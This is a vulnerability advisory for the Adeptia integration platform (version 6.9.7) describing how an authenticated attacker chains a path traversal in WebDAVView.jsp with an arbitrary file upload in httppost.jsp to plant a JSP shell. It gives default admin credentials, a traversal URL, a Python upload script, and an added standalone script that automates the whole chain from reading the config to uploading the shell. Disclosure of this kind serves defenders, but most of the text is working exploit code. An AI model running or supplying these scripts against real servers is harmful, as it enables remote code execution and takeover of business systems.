Abstract

Adeptia is a low-code integration platform that companies use to automate business information flows. An authenticated attacker can chain two vulnerabilities in the web application to execute arbitrary code on the server.

Tested versions

This issue was tested on Adeptia version 6.9.7 (Enterprise Edition, Build Tag Release_6_7_12June_2017). It is likely that other versions are also affected.

Introduction

Adeptia is a low-code integration platform. Authenticated users can create various automation flows with pre-programmed components. These components vary from basic input/output interfaces to running custom plugins and making web requests. However, components are sandboxed and shouldn't allow access outside the flow context. There is also a Native Calls component to run sh scripts, but it requires a shell script to already exist on the system.

The application contains a path traversal vulnerability that attackers can use to download arbitrary files. Information from the Adeptia configuration can then be used to exploit an arbitrary file upload vulnerability to write jsp files into the webroot and execute arbitrary code.

An attacker needs to be logged in to exploit these vulnerabilities. The default credentials are admin:indigo1.

Details

The administrative section of Adeptia contains a path traversal vulnerability via WebDAVView.jsp. The vulnerability can be exploited to download arbitrary files. An example is:

http://server/adeptia/WebDAVView.jsp?filePath=../../bin/license.txt

The path traversal issue can be used to download the Adeptia configuration files, like server-configure.properties. The configuration files contain the path to the webroot, which is required to upload arbitrary files.

Path traversal can be used to download the server's jar files. Reversing the jars shows an httppost$jsp.class with an upload function. The upload function allows users to write to arbitrary locations on the disk. The screenshot below shows that a call to httppost.jsp fills a 4096-byte buffer with the web request, which it will then write to a location determined by the variable FileName.



The following Python script uploads the file pnt_hi.jsp to the server's webroot. Note that it fills the 4096-byte buffer with spaces. Without the spaces the remainder of the buffer is padded with null bytes, which breaks the jsp.

import requests

# Session of an authenticated user (the default credentials are admin:indigo1)
headers = {
    'Cookie': 'maintab=tcontent1; JSESSIONID=[session_id]',
    'User-Agent': 'Mozilla/5.0 [user agent]'
}
# FileName is the absolute path httppost.jsp writes to; the webroot was taken from server-configure.properties
url = "http://[host]:8080/adeptia/control/httppost.jsp?FileName=D:\\AdeptiaSuite\\AdeptiaSuite-6.9\\AdeptiaServer\\ServerKernel\\web\\pnt_hi.jsp"
# Read as bytes so the length matches what the server buffers
data = open('pnt_hi.jsp', 'rb').read()
# Pad to exactly 4096 bytes with spaces; otherwise the server null-pads the buffer and the jsp breaks
missing = 4096 - len(data)
data += b' ' * missing
res = requests.get(url, data=data, headers=headers, verify=False)
print(res.text)

Then just visit [server]:8080/adeptia/pnt_hi.jsp to get your shell.
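The following script, added here as an example and not part of the original advisory, chains the two steps above: it downloads the configuration through the WebDAVView.jsp traversal, parses it as a Java .properties file to get the webroot, pads the jsp to the 4096-byte buffer and sends it to httppost.jsp. It uses only the standard library (urllib instead of requests). Three things are assumptions: the traversal path to server-configure.properties (the reader passes it on the command line, since the advisory only shows ../../bin/license.txt), the property key abpm.webroot.path (take the real key from the downloaded file), and the constructed sample configuration used to exercise the parser offline. The padding helper also refuses a payload larger than the buffer, because only 4096 bytes would be written.

```python
import re
import sys
import urllib.parse
import urllib.request

BUFFER_SIZE = 4096  # httppost.jsp copies the request body into a fixed 4096-byte buffer

# Constructed sample in Java .properties syntax; not a real Adeptia config file.
# The key name abpm.webroot.path is an assumption: take the real key from the
# server-configure.properties downloaded via WebDAVView.jsp.
SAMPLE_PROPERTIES = r"""# constructed sample, not a real Adeptia file
abpm.server.port=8080
abpm.webroot.path=D:\\AdeptiaSuite\\AdeptiaSuite-6.9\\AdeptiaServer\\ServerKernel\\web
"""

_ESCAPES = {"t": "\t", "n": "\n", "r": "\r", "f": "\f"}


def _unescape(s):
    # Resolve .properties escapes: \\ \t \n \r \f \uXXXX; any other backslash is dropped.
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            i += 2
            if nxt == "u" and i + 4 <= len(s):
                out.append(chr(int(s[i:i + 4], 16)))
                i += 4
            else:
                out.append(_ESCAPES.get(nxt, nxt))
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def _continued(line):
    # A line ending in an odd number of backslashes continues on the next line.
    return (len(line) - len(line.rstrip("\\"))) % 2 == 1


def parse_properties(text):
    """Parse Java .properties text (comments, continuations, '=' or ':' separators)."""
    logical, pending = [], None
    for raw in text.splitlines():
        line = raw.lstrip()              # leading whitespace is ignored, as in Java
        pending = line if pending is None else pending + line
        if _continued(pending):
            pending = pending[:-1]       # drop the continuation backslash and keep reading
            continue
        logical.append(pending)
        pending = None
    if pending is not None:
        logical.append(pending)
    props = {}
    for line in logical:
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[_unescape(m.group(1))] = _unescape(m.group(2))
    return props


def pad_payload(payload, size=BUFFER_SIZE):
    """Pad the jsp to exactly `size` bytes with spaces (harmless inside a jsp); a
    shorter body is null-padded by the server, which breaks the page. Refuse
    anything larger, since only `size` bytes would be written to disk."""
    if len(payload) > size:
        raise ValueError(f"payload is {len(payload)} bytes, buffer holds {size}")
    return payload + b" " * (size - len(payload))


def build_upload_path(target_path):
    """Path and query for httppost.jsp with the destination file name URL-encoded."""
    return "/adeptia/control/httppost.jsp?" + urllib.parse.urlencode({"FileName": target_path})


def fetch(base, path, cookie, body=None):
    # GET with an optional body, the same request shape the exploit above uses.
    req = urllib.request.Request(base.rstrip("/") + path, data=body, method="GET",
                                 headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


if __name__ == "__main__":
    # usage: chain.py http://host:8080 "JSESSIONID=..." <traversal path to server-configure.properties> shell.jsp
    base, cookie, config_rel, jsp_file = sys.argv[1:5]
    config = fetch(base, "/adeptia/WebDAVView.jsp?" + urllib.parse.urlencode({"filePath": config_rel}), cookie)
    webroot = parse_properties(config.decode("utf-8", "replace"))["abpm.webroot.path"]  # assumed key
    sep = "\\" if "\\" in webroot else "/"  # the advisory's target is a Windows install
    with open(jsp_file, "rb") as f:
        body = pad_payload(f.read())
    fetch(base, build_upload_path(webroot.rstrip("\\/") + sep + "pnt_hi.jsp"), cookie, body)
    print(f"uploaded; visit {base.rstrip('/')}/adeptia/pnt_hi.jsp")
```

The parser follows the Java .properties rules that matter for a Windows path: a doubled backslash decodes to one, a trailing backslash joins the next line, and a `:` works as a separator just like `=`, so a value read from the real file comes out as the literal path httppost.jsp expects in FileName.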

Timeline

~August 2024 - Tried to report via contact form and LinkedIn, no response
~September 2024 - Further attempts to report, no response
14 September 2025 - Published